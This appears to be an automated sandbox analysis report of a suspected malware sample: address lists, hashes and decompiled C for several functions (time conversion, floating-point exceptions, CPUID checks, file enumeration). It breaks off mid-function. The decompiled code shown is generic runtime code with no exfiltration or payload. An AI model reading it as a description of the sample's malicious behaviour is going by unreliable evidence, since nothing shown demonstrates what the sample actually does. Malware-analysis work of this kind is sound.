0x00417ed1
0x00417ed9
0x00417edf
0x00417edf
0x00417edf
0x00417edf
0x00417ed1
0x00417ee2
0x00417ee4
0x00417eeb
0x00417eeb
0x00417eee
0x00417ef1
0x00417ef7
0x00417efa
0x00417efd
0x00417f06
0x00417f0c
0x00417f0f
0x00417f12
0x00417f12
0x00417f15
0x00417f1c
0x00417f1c
0x00417f17
0x00417f17
0x00417f17
0x00417f1e
0x00417f21
0x00417f23
0x00417f26
0x00417f2d
0x00417f30
0x00417f33
0x00417f35
0x00417f40
0x00417f43
0x00417f48
0x00417f4d
0x00417f54
0x00417f59
0x00417f5b
0x00417f5d
0x00417f61
0x00417f64
0x00417f67
0x00417f6f
0x00417f78
0x00417f78
0x00417f7a
0x00417f7d
0x00417f7d
0x00417f67
0x00417f80
0x00417f88
0x00417f8d
0x00417f92
0x00417f94
0x00417f96
0x00417f98
0x00417f9b
0x00417f9e
0x00417fa0
0x00417fa3
0x00417fa6
0x00417fa9
0x00417fab
0x00417fb2
0x00417fb7
0x00417fba
0x00417fc4
0x00417fc6
0x00417fc8
0x00417fcb
0x00417fcb
0x00417fcd
0x00417fd0
0x00417fd3
0x00417fd6
0x00417fd9
0x00417fad
0x00417fad
0x00417fb0
0x00000000
0x00000000
0x00417fb0
0x00417fdc
0x00417fde
0x00417fe0
0x00000000
0x00417fe2
0x00417fe2
0x00417fe5
0x00417fe7
0x00417fe7
0x00417ff5
0x00417ff8
0x00417ffd
0x00417fff
0x00000000
0x00000000
0x00418001
0x00418008
0x00418008
0x0041800b
0x0041800e
0x00418011
0x00418014
0x00418014
0x00418017
0x0041801a
0x0041801e
0x00418021
0x00418023
0x00418026
0x00000000
0x00000000
0x00418028
0x00418026
0x00418003
0x00418003
0x00418006
0x00000000
0x00000000
0x00000000
0x00000000
0x00418006
0x0041802d
0x0041802d
0x00000000
0x0041802d
0x0041802a
0x00000000
0x0041802a
0x00417fe5
0x00417fe0
0x00418030
0x00418030
0x00418032
0x0041803c
0x0041803c
0x0041803f
0x00418041
0x00418043
0x00418045
0x0041804a
0x0041804d
0x0041804d
0x00418050
0x00418053
0x00418056
0x00418058
0x0041806d
0x0041806f
0x00418071
0x00418073
0x00418075
0x00418077
0x00418079
0x0041807b
0x0041807e
0x0041807e
0x00418082
0x00418084
0x0041808a
0x0041808d
0x0041808d
0x0041808d
0x00418091
0x00418091
0x00418096
0x00418099
0x00418099
0x0041809e
0x004180a0
0x004180a2
0x004180a9
0x004180a9
0x004180ab
0x004180b0
0x004180b2
0x004180b5
0x004180b5
0x004180b8
0x004180c0
0x004180c0
0x004180c2
0x004180c2
0x004180c7
0x004180cd
0x004180d1
0x004180d4
0x004180d7
0x004180d9
0x004180d9
0x004180d9
0x004180de
0x004180de
0x004180e1
0x004180e4
0x004180a4
0x004180a4
0x004180a7
0x00000000
0x00000000
0x004180a7
0x004180a2
0x004180eb
0x004180eb
0x004180ec
0x00418034
0x00418034
0x00418036
0x00000000
0x00000000
0x00418036
0x004180ef
0x004180fc
0x004180ff
0x00418102
0x00418106
0x00418107
0x0041810a
0x0041810d
0x00418113
0x00418114
0x00418117
0x0041811a
0x0041811d
0x0041811d
0x00417f12
0x00418128
0x0041812b
0x0041812c
0x0041812e
0x00418130
0x00418135
0x00418140
0x00418140
0x00418146
0x00418149
0x0041814a
0x0041814a
0x00418140
0x0041814e
0x00418150
0x00418152
0x00418154
0x00418154
0x00418158
0x00000000
0x00000000
0x0041815a
0x0041815a
0x0041815d
0x0041815f
0x00000000
0x00000000
0x00000000
0x0041815f
0x00418154
0x00418161
0x0041816c
0x0041816c
0x00417e7e
0x00417d1c
0x00417d1c
0x00417d1c
0x00417d1f
0x00417d25
0x00417d56
0x00417d58
0x00417d9a
0x00417d9c
0x00417da3
0x00417daa
0x00417dad
0x00417db0
0x00417db2
0x00417db2
0x00417db3
0x00417db6
0x00417dc0
0x00417dca
0x00417dcf
0x00417dd2
0x00417dd4
0x00417dd7
0x00417de0
0x00417de3
0x00417de6
0x00417de9
0x00417def
0x00417df2
0x00417df5
0x00417df5
0x00417df5
0x00417dfa
0x00417dfa
0x00417e05
0x00417e10
0x00417e13
0x00417e1f
0x00417e24
0x00417e2f
0x00417e31
0x00417e33
0x00417e39
0x00417e3e
0x00417e40
0x00417e46
0x00417d5a
0x00417d65
0x00417d68
0x00417d74
0x00417d76
0x00417d7d
0x00417d7f
0x00417d87
0x00417d89
0x00417d8b
0x00417d90
0x00417d93
0x00417d99
0x00417d99
0x00417d27
0x00417d35
0x00417d41
0x00417d43
0x00417d55
0x00417d55
0x00417d25
0x00417d16
0x00417d05

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e681c978a77b184634753893cf989fe4b4ab3410c804f19c061e126da2d43db
Instruction ID: 77f35bd801acd395c96521598554b25620c35c8731e651523fb7acdf66d93129
Opcode Fuzzy Hash: 5e681c978a77b184634753893cf989fe4b4ab3410c804f19c061e126da2d43db
Instruction Fuzzy Hash: 5BF13C71E002199FDF14CFA9C9806EEBBB1EF88314F25826ED819A7344D735AE458B94

Uniqueness

Uniqueness Score: -1.00%

Function 00417043 Relevance: 3.0, APIs: 2, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00417043(void* __ecx, signed int __edx, signed int* _a4) {
				struct _FILETIME _v12;
				signed int _t12;
				signed int _t13;
				signed int* _t16;
				signed int _t17;
				void* _t18;

				_t17 = __edx;
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v12);
				_t15 = _v12.dwHighDateTime;
				_t12 = _v12.dwLowDateTime - 0xd53e8000;
				asm("sbb ecx, 0x19db1de");
				_t18 = _v12.dwHighDateTime - 0x483f078;
				if(_t18 > 0 || _t18 >= 0 && _t12 >= 0xdd478000) {
					_t13 = _t12 | 0xffffffff;
					_t17 = _t13;
				} else {
					_t13 = E0042A560(_t12, _t15, 0x989680, 0);
				}
				_t16 = _a4;
				if(_t16 != 0) {
					 *_t16 = _t13;
					_t16[1] = _t17;
					return _t13;
				}
				return _t13;
			}

0x00417043
0x0041704a
0x00417051
0x00417056
0x0041705f
0x00417062
0x00417067
0x0041706d
0x00417073
0x0041708e
0x00417091
0x0041707e
0x00417087
0x00417087
0x00417093
0x00417098
0x0041709a
0x0041709c
0x00000000
0x0041709c
0x004170a0

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040588F,00000000,41D6575C), ref: 00417056
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00417087

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: dec4cc87ddb8ba2cc3f5b8fe23f419fa72b80fc4b171eaeac1008e39cef929db
Instruction ID: e4b684b51f647c3d9e8e54b137a0c2849ba774b7a802a84078af4489d84c5930
Opcode Fuzzy Hash: dec4cc87ddb8ba2cc3f5b8fe23f419fa72b80fc4b171eaeac1008e39cef929db
Instruction Fuzzy Hash: F9F02B319003047BEB14DF64C846BAE7FF9EF44319F34465DA506D2280D6B8EE80C709

Uniqueness

Uniqueness Score: -1.00%

Function 00420458 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00420458(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00420A8E(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E004209FA(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00420466
0x0042046d
0x00420472
0x00420478
0x0042047b
0x00420481
0x00420486
0x0042048b
0x0042048b
0x00420491
0x00420496
0x0042049b
0x0042049b
0x004204a2
0x004204a7
0x004204ac
0x004204ac
0x004204b3
0x004204b8
0x004204bd
0x004204bd
0x004204c4
0x004204c9
0x004204ce
0x004204ce
0x004204d6
0x004204e6
0x004204f8
0x0042050a
0x0042051d
0x0042052f
0x00420537
0x0042053c
0x00420541
0x00420541
0x00420548
0x0042054d
0x0042054d
0x00420554
0x00420559
0x00420559
0x00420560
0x00420565
0x00420565
0x0042056c
0x00420571
0x00420571
0x0042057b
0x0042057d
0x004205b7
0x0042057f
0x00420584
0x004205a8
0x004205b0
0x004205a4
0x004205a4
0x004205ba
0x004205c1
0x004205c3
0x004205e5
0x004205ed
0x004205f0
0x004205f0
0x004205f2
0x004205f2
0x004205fd
0x00420603
0x00420608
0x0042060f
0x00420649
0x00420654
0x0042065a
0x0042065d
0x00420660
0x0042066c
0x00420674
0x00420611
0x00420614
0x00420620
0x00420626
0x0042062c
0x0042062f
0x00420638
0x00420638
0x00420677
0x00420685
0x0042068b
0x0042068e
0x00420693
0x00420695
0x00420698
0x00420698
0x0042069d
0x0042069f
0x004206a2
0x004206a2
0x004206a7
0x004206a9
0x004206ac
0x004206ac
0x004206b1
0x004206b3
0x004206b6
0x004206b6
0x004206bb
0x004206bd
0x004206bd
0x004206ca
0x004206cd
0x00420704
0x004206cf
0x004206cf
0x004206d2
0x004206fd
0x004206f2
0x004206f2
0x00420706
0x0042070e
0x00420711
0x00420730
0x00420735
0x00420735
0x00420737
0x0042073c
0x00420748
0x0042073e
0x00420741
0x00420741
0x0042074d
0x0042074d
0x00420713
0x00420716
0x00420725
0x00000000
0x00420725
0x00420718
0x0042071b
0x0042071d
0x0042071d
0x00000000
0x0042071b
0x004206d4
0x004206d7
0x004206ed
0x00000000
0x004206ed
0x004206dc
0x004206de
0x004206de
0x004206dc
0x00000000
0x004206cd
0x004205ca
0x004205d8
0x004205e0
0x00000000
0x004205e0
0x004205ce
0x004205d3
0x004205d3
0x00000000
0x004205ce
0x0042058b
0x00420599
0x004205a1
0x00000000
0x004205a1
0x0042058f
0x00420594
0x00420594
0x0042058f

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00420453,?,?,00000008,?,?,00429836,00000000), ref: 00420685

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 842b7d40d0ac833d504d2ede522a045897a3e008537b4cf18dec7c6eca2c6621
Instruction ID: cfd1191240fcee16ba694292e5e2dd91c6831104e7c07d96e464fa92562b4bf5
Opcode Fuzzy Hash: 842b7d40d0ac833d504d2ede522a045897a3e008537b4cf18dec7c6eca2c6621
Instruction Fuzzy Hash: B5B13731210618DFD714CF28D48AB667BE0FF45364F658659E89ACF2A2C339E992CF44

Uniqueness

Uniqueness Score: -1.00%

Function 008406BF Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,008406BA,?,?,?,?,?,?,00000000), ref: 008408EC

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 842b7d40d0ac833d504d2ede522a045897a3e008537b4cf18dec7c6eca2c6621
Instruction ID: cb0acfdd4baf4c15d52ee6a4b3e0f352b332a10f31051c289e5b720e84506dad
Opcode Fuzzy Hash: 842b7d40d0ac833d504d2ede522a045897a3e008537b4cf18dec7c6eca2c6621
Instruction Fuzzy Hash: CFB13A35610608DFE714CF28C486B667FA0FF45365F298658E99ACF2A2C335E991CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFE3 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040DFE3(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x43c54c =  *0x43c54c & 0x00000000;
				 *0x43b060 =  *0x43b060 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x43c550; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x43c550 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x43b060; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x43c54c = 1;
					 *0x43b060 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x43c54c = 2;
						 *0x43b060 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x43b060; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x43c54c = 3;
								 *0x43b060 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x43c54c = 5;
									 *0x43b060 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x43b060 =  *0x43b060 | 0x00000040;
										 *0x43c54c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x43c550; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x43c550 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0040dfe3
0x0040dfe6
0x0040dff0
0x0040e001
0x0040e1b0
0x0040e1b3
0x0040e1b3
0x0040e007
0x0040e00d
0x0040e012
0x0040e016
0x0040e01a
0x0040e01b
0x0040e01d
0x0040e020
0x0040e025
0x0040e02e
0x0040e03f
0x0040e04a
0x0040e050
0x0040e051
0x0040e056
0x0040e059
0x0040e05e
0x0040e066
0x0040e069
0x0040e06c
0x0040e0b1
0x0040e0b1
0x0040e0b7
0x0040e0b7
0x0040e0bc
0x0040e0bd
0x0040e0c3
0x0040e0f4
0x0040e0c5
0x0040e0c7
0x0040e0c8
0x0040e0cd
0x0040e0d0
0x0040e0d2
0x0040e0d5
0x0040e0d8
0x0040e0db
0x0040e0de
0x0040e0e7
0x0040e0ec
0x0040e0ec
0x0040e0e7
0x0040e0f7
0x0040e0fc
0x0040e0ff
0x0040e109
0x0040e114
0x0040e11a
0x0040e11d
0x0040e127
0x0040e132
0x0040e13e
0x0040e141
0x0040e144
0x0040e14f
0x0040e154
0x0040e156
0x0040e15b
0x0040e15e
0x0040e168
0x0040e170
0x0040e175
0x0040e17f
0x0040e18d
0x0040e1a0
0x0040e1a7
0x0040e1a7
0x0040e18d
0x0040e170
0x0040e154
0x0040e132
0x00000000
0x0040e1af
0x0040e071
0x0040e07b
0x0040e0a0
0x0040e0a6
0x0040e0a9
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040DFF9

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 9d34b2d756c4e6b9aefe2567626eb22b38f8903c9283d486ca974ec7f634f800
Instruction ID: ff96ea240b499fb9a017334d1bbccfa51a19fc54f06d8edb65e4a504e2bd557c
Opcode Fuzzy Hash: 9d34b2d756c4e6b9aefe2567626eb22b38f8903c9283d486ca974ec7f634f800
Instruction Fuzzy Hash: BE516DB19006298BEB18CF5AD9C17AABBF0FB44354F24893AD415FB390D378A950CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004225FD Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004225FD(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E0041CA2B(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E0042669C(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E00422941(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E0041CA88(_t165);
								_t167 = _v8;
							}
							E0041CA88(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E0042669C(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00411D34();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x43b054; // 0x41d6575c
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E004298E0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E0041852B(_t138 - _t160 + 1, _t160,  &_v672, E004222E8(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
